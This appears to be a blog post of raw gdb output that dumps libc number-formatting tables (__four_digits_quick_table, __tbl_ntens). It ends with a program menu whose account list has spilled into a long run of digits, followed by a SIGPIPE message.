0xff325aa4 <__four_digits_quick_table+3986>: 0x36383739 0x37363739 0x38343739 0x39323830
0xff325ab4 <__four_digits_quick_table+4002>: 0x30303830 0x30383830 0x31363830 0x32343830
(gdb)
0xff325ac4 <__four_digits_quick_table+4018>: 0x33323830 0x34303830 0x34383830 0x35363830
0xff325ad4 <__four_digits_quick_table+4034>: 0x36343830 0x37323830 0x38303830 0x38383830
0xff325ae4 <__four_digits_quick_table+4050>: 0x39363831 0x30343831 0x31323831 0x32303831
0xff325af4 <__four_digits_quick_table+4066>: 0x32383831 0x33363831 0x34343831 0x35323831
0xff325b04 <__four_digits_quick_table+4082>: 0x36303831 0x36383831 0x37363831 0x38343831
0xff325b14 <__four_digits_quick_table+4098>: 0x39323832 0x30303832 0x30383832 0x31363832
0xff325b24 <__four_digits_quick_table+4114>: 0x32343832 0x33323832 0x34303832 0x34383832
0xff325b34 <__four_digits_quick_table+4130>: 0x35363832 0x36343832 0x37323832 0x38303832
0xff325b44 <__four_digits_quick_table+4146>: 0x38383832 0x39363833 0x30343833 0x31323833
0xff325b54 <__four_digits_quick_table+4162>: 0x32303833 0x32383833 0x33363833 0x34343833
0xff325b64 <__four_digits_quick_table+4178>: 0x35323833 0x36303833 0x36383833 0x37363833
0xff325b74 <__four_digits_quick_table+4194>: 0x38343833 0x39323834 0x30303834 0x30383834
0xff325b84 <__four_digits_quick_table+4210>: 0x31363834 0x32343834 0x33323834 0x34303834
0xff325b94 <__four_digits_quick_table+4226>: 0x34383834 0x35363834 0x36343834 0x37323834
0xff325ba4 <__four_digits_quick_table+4242>: 0x38303834 0x38383834 0x39363835 0x30343835
0xff325bb4 <__four_digits_quick_table+4258>: 0x31323835 0x32303835 0x32383835 0x33363835
0xff325bc4 <__four_digits_quick_table+4274>: 0x34343835 0x35323835 0x36303835 0x36383835
0xff325bd4 <__four_digits_quick_table+4290>: 0x37363835 0x38343835 0x39323836 0x30303836
0xff325be4 <__four_digits_quick_table+4306>: 0x30383836 0x31363836 0x32343836 0x33323836
0xff325bf4 <__four_digits_quick_table+4322>: 0x34303836 0x34383836 0x35363836 0x36343836
0xff325c04 <__four_digits_quick_table+4338>: 0x37323836 0x38303836 0x38383836 0x39363837
0xff325c14 <__four_digits_quick_table+4354>: 0x30343837 0x31323837 0x32303837 0x32383837
0xff325c24 <__four_digits_quick_table+4370>: 0x33363837 0x34343837 0x35323837 0x36303837
0xff325c34 <__four_digits_quick_table+4386>: 0x36383837 0x37363837 0x38343837 0x39323838
(gdb)
0xff325c44 <__four_digits_quick_table+4402>: 0x30303838 0x30383838 0x31363838 0x32343838
0xff325c54 <__four_digits_quick_table+4418>: 0x33323838 0x34303838 0x34383838 0x35363838
0xff325c64 <__four_digits_quick_table+4434>: 0x36343838 0x37323838 0x38303838 0x38383838
0xff325c74 <__four_digits_quick_table+4450>: 0x39363839 0x30343839 0x31323839 0x32303839
0xff325c84 <__four_digits_quick_table+4466>: 0x32383839 0x33363839 0x34343839 0x35323839
0xff325c94 <__four_digits_quick_table+4482>: 0x36303839 0x36383839 0x37363839 0x38343839
0xff325ca4 <__four_digits_quick_table+4498>: 0x39323930 0x30303930 0x30383930 0x31363930
0xff325cb4 <__four_digits_quick_table+4514>: 0x32343930 0x33323930 0x34303930 0x34383930
0xff325cc4 <__four_digits_quick_table+4530>: 0x35363930 0x36343930 0x37323930 0x38303930
0xff325cd4 <__four_digits_quick_table+4546>: 0x38383930 0x39363931 0x30343931 0x31323931
0xff325ce4 <__four_digits_quick_table+4562>: 0x32303931 0x32383931 0x33363931 0x34343931
0xff325cf4 <__four_digits_quick_table+4578>: 0x35323931 0x36303931 0x36383931 0x37363931
0xff325d04 <__four_digits_quick_table+4594>: 0x38343931 0x39323932 0x30303932 0x30383932
0xff325d14 <__four_digits_quick_table+4610>: 0x31363932 0x32343932 0x33323932 0x34303932
0xff325d24 <__four_digits_quick_table+4626>: 0x34383932 0x35363932 0x36343932 0x37323932
0xff325d34 <__four_digits_quick_table+4642>: 0x38303932 0x38383932 0x39363933 0x30343933
0xff325d44 <__four_digits_quick_table+4658>: 0x31323933 0x32303933 0x32383933 0x33363933
0xff325d54 <__four_digits_quick_table+4674>: 0x34343933 0x35323933 0x36303933 0x36383933
0xff325d64 <__four_digits_quick_table+4690>: 0x37363933 0x38343933 0x39323934 0x30303934
0xff325d74 <__four_digits_quick_table+4706>: 0x30383934 0x31363934 0x32343934 0x33323934
0xff325d84 <__four_digits_quick_table+4722>: 0x34303934 0x34383934 0x35363934 0x36343934
0xff325d94 <__four_digits_quick_table+4738>: 0x37323934 0x38303934 0x38383934 0x39363935
0xff325da4 <__four_digits_quick_table+4754>: 0x30343935 0x31323935 0x32303935 0x32383935
0xff325db4 <__four_digits_quick_table+4770>: 0x33363935 0x34343935 0x35323935 0x36303935
(gdb)
0xff325dc4 <__four_digits_quick_table+4786>: 0x36383935 0x37363935 0x38343935 0x39323936
0xff325dd4 <__four_digits_quick_table+4802>: 0x30303936 0x30383936 0x31363936 0x32343936
0xff325de4 <__four_digits_quick_table+4818>: 0x33323936 0x34303936 0x34383936 0x35363936
0xff325df4 <__four_digits_quick_table+4834>: 0x36343936 0x37323936 0x38303936 0x38383936
0xff325e04 <__four_digits_quick_table+4850>: 0x39363937 0x30343937 0x31323937 0x32303937
0xff325e14 <__four_digits_quick_table+4866>: 0x32383937 0x33363937 0x34343937 0x35323937
0xff325e24 <__four_digits_quick_table+4882>: 0x36303937 0x36383937 0x37363937 0x38343937
0xff325e34 <__four_digits_quick_table+4898>: 0x39323938 0x30303938 0x30383938 0x31363938
0xff325e44 <__four_digits_quick_table+4914>: 0x32343938 0x33323938 0x34303938 0x34383938
0xff325e54 <__four_digits_quick_table+4930>: 0x35363938 0x36343938 0x37323938 0x38303938
0xff325e64 <__four_digits_quick_table+4946>: 0x38383938 0x39363939 0x30343939 0x31323939
0xff325e74 <__four_digits_quick_table+4962>: 0x32303939 0x32383939 0x33363939 0x34343939
0xff325e84 <__four_digits_quick_table+4978>: 0x35323939 0x36303939 0x36383939 0x37363939
0xff325e94 <__four_digits_quick_table+4994>: 0x38343939 0x39320000 0x00000000 0x3ff00000
0xff325ea4 <__tbl_ntens+4>: 0x00000000 0x3fb99999 0x9999999a 0x3f847ae1
0xff325eb4 <__tbl_ntens+20>: 0x47ae147b 0x3f50624d 0xd2f1a9fc 0x3f1a36e2
0xff325ec4 <__tbl_ntens+36>: 0xeb1c432d 0x3ee4f8b5 0x88e368f1 0x3eb0c6f7
0xff325ed4 <__tbl_ntens+52>: 0xa0b5ed8d 0x3e7ad7f2 0x9abcaf48 0x3e45798e
0xff325ee4 <__tbl_ntens+68>: 0xe2308c3a 0x3e112e0b 0xe826d695 0x3ddb7cdf
0xff325ef4 <__tbl_ntens+84>: 0xd9d7bdbb 0x3da5fd7f 0xe1796495 0x3d719799
0xff325f04 <__tbl_ntens+100>: 0x812dea11 0x3d3c25c2 0x68497682 0x3d06849b
0xff325f14 <__tbl_ntens+116>: 0x86a12b9b 0x3cd203af 0x9ee75616 0x3c9cd2b2
0xff325f24 <__tbl_ntens+132>: 0x97d889bc 0x3c670ef5 0x4646d497 0x3c32725d
0xff325f34 <__tbl_ntens+148>: 0xd1d243ac 0x3bfd83c9 0x4fb6d2ac 0x3bc79ca1
.....
0xff324b6cPress RETURN to see menu again; 'q' to quit adding groups; '?' for more help.
Please enter a group number [1-43] or command [cptqx?] : These are the categories of accounts:
1) 7601840192020002080216022402320240024802560264027202800288029603040312032003280336034403520360036803760384039204000408041604240432044004480456046404720480048804960504051205200528053605440552056005680576058405920600060806160624063206400648065606640672068006880696070407120720072807360744075207600768077607840792080008080816082408320840084808560864087208800888089609040912092009280936094409520960096809760984099210001008101610241032104010481056106410721080108810961104111211201128113611441152116011681176118411921200120812161224123212401248125612641272128012881296130413121320132813361344135213601368137613841392140014081416142414321440144814561464147214801488149615041512152015281536154415521560156815761584159216001608161616241632164016481656166416721680168816961704171217201728173617441752176017681776178417921800180818161824183218401848185618641872188018881896190419121920192819361944195219601968197619841992200020082016202420322040204820562064207220802088209621042112212021282136214421522160216821762184219222002208221622242232224022482256226422722280228822962304231223202328233623442352236023682376238423922400240824162424243224402448245624642472248024882496250425122520252825362544255225602568257625842592260026082616262426322640264826562664267226802688269627042712272027282736274427522760276827762784279228002808281628242832284028482856286428722880288828962904291229202928293629442952296029682976298429923000300830163024303230403048305630643072308030883096310431123120312831363144315231603168317631843192320032083216322432323240324832563264327232803288329633043312332033283336334433523360336833763384339234003408341634243432344034483456346434723480348834963504351235203528353635443552356035683576358435923600360836163624363236403648365636643672368036883696370437123720372837363744375237603768377637843792380038083816382438323840384838563864387238803888389639043912392039283936394439523960396839763984399240004008401640244032404040484056406440724080408840964104411241204128413641444152416041684176418441924200420842164224423242404248425642644272428042884296430443124320432843364344435243604368437643844392440044084416442444324440444844564464447244804488449645044512452045284536454445524560456845764584459246004608461646244632464046484656466446724680468846964704471247204728473647444752476047684776478447924800480848164824483248404848485648644872488048884896490449124920492849364944495249604968497649844992500050085016502450325040504850565064507250805088509651045112512051285136514451525160516851765184519252005208521652245232524052485256526452725280528852965304531253205328533653445352536053685376538453925400540854165424543254405448545654645472548054885496550455125520552855365544555255605568557655845592560056085616562456325640564856565664567256805688569657045712572057285736574457525760576857765784579258005808581658245832584058485856586458725880588858965904591259205928593659445952596059685976598459926000600860166024603260406048605660646072608060886096610461126120612861366144615261606168617661846192620062086216622462326240624862566264627262806288629663046312632063286336634463526360636863766384639264006408641664246432644064486456646464726480648864966504651265206528653665446552656065686576658465926600660866166624663266406648665666646672668066886696670467126720672867366744675267606768677667846792680068086816682468326840684868566864687268806888689669046912692069286936694469526960696869766984699270007008701670247032704070487056706470727080708870967104711271207128713671447152716071687176718471927200720872167224723272407248725672647272728072887296730473127320732873367344735273607368737673847392740074087416742474327440744874567464747274807488749675047512752075 44755275607568757675847592760076--More--
Program received signal SIGPIPE, Broken pipe.
Leave a Reply